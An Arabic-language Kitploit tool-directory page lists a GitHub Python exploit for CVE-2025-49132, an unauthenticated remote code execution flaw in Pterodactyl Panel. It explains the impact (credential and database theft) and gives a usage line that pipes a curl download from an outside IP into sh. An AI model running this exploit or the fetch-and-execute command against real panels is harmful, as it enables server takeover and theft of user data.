Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-49132 — استغلال بايثون لـ CVE-2025-49132، يتيح تنفيذ أوامر عن بعد دون مصادقة على Pterodactyl Panel عبر معاملات locale و namespace مصمّمة. | Kitploit
أدوات/GitHubGitHub/scroollocker/cve-2025-49132
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةتطوير الحمولات
GitHubscroollocker/cve-2025-49132

CVE-2025-49132

استغلال بايثون لـ CVE-2025-49132، يتيح تنفيذ أوامر عن بعد دون مصادقة على Pterodactyl Panel عبر معاملات locale و namespace مصمّمة.

عرض المستودع
9منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

تأثير

باستخدام ملف /locales/locale.json مع معامِلات الاستعلام locale و namespace، يمكن للمهاجم الخبيث تنفيذ كود عشوائي، دون الحاجة إلى المصادقة.

مع القدرة على تنفيذ كود عشوائي، يمكن استغلال هذه الثغرة بعدد لا حصر له من الطرق. يمكن استخدامها للوصول إلى خادم اللوحة، قراءة بيانات الاعتماد من تكوين اللوحة (.env أو غيره)، استخراج معلومات حساسة من قاعدة البيانات (مثل تفاصيل المستخدم [اسم المستخدم، البريد الإلكتروني، الاسم الأول والأخير، كلمة المرور المُشفَّرة، عناوين IP، إلخ])، الوصول إلى ملفات الخوادم التي تديرها اللوحة، إلخ.

كيفية الاستخدام


python exploit.py --target "pterodactyl.htb" --cmd 'curl http://10.10.14.22:8080/dbs.sh | sh' 

تنزيل الأداة